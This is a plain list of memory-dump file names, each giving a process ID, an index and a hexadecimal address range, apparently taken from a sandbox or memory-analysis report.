memory/2768-2100-0x00007FF723FA0000-0x00007FF724392000-memory.dmp

memory/4296-2102-0x00007FF7D5D10000-0x00007FF7D6102000-memory.dmp

memory/2104-2104-0x00007FF631660000-0x00007FF631A52000-memory.dmp

memory/4920-2112-0x00007FF7A0010000-0x00007FF7A0402000-memory.dmp

memory/4076-2114-0x00007FF670090000-0x00007FF670482000-memory.dmp

memory/2960-2109-0x00007FF6F9BB0000-0x00007FF6F9FA2000-memory.dmp

memory/4600-2107-0x00007FF754790000-0x00007FF754B82000-memory.dmp

memory/4268-2111-0x00007FF7C4EC0000-0x00007FF7C52B2000-memory.dmp

memory/2844-2122-0x00007FF6B35F0000-0x00007FF6B39E2000-memory.dmp

memory/4944-2124-0x00007FF67E920000-0x00007FF67ED12000-memory.dmp

memory/5116-2126-0x00007FF6C0650000-0x00007FF6C0A42000-memory.dmp

memory/4760-2119-0x00007FF7E0EC0000-0x00007FF7E12B2000-memory.dmp

memory/3512-2121-0x00007FF685970000-0x00007FF685D62000-memory.dmp

memory/848-2117-0x00007FF622760000-0x00007FF622B52000-memory.dmp

memory/2596-2128-0x00007FF6E9490000-0x00007FF6E9882000-memory.dmp

memory/1644-2130-0x00007FF7475D0000-0x00007FF7479C2000-memory.dmp

memory/4128-2133-0x00007FF7CC450000-0x00007FF7CC842000-memory.dmp

memory/4176-2134-0x00007FF6DC120000-0x00007FF6DC512000-memory.dmp

memory/964-2178-0x00007FF7F0DF0000-0x00007FF7F11E2000-memory.dmp

memory/4320-2180-0x00007FF78A0E0000-0x00007FF78A4D2000-memory.dmp

memory/3492-2183-0x00007FF7BDAF0000-0x00007FF7BDEE2000-memory.dmp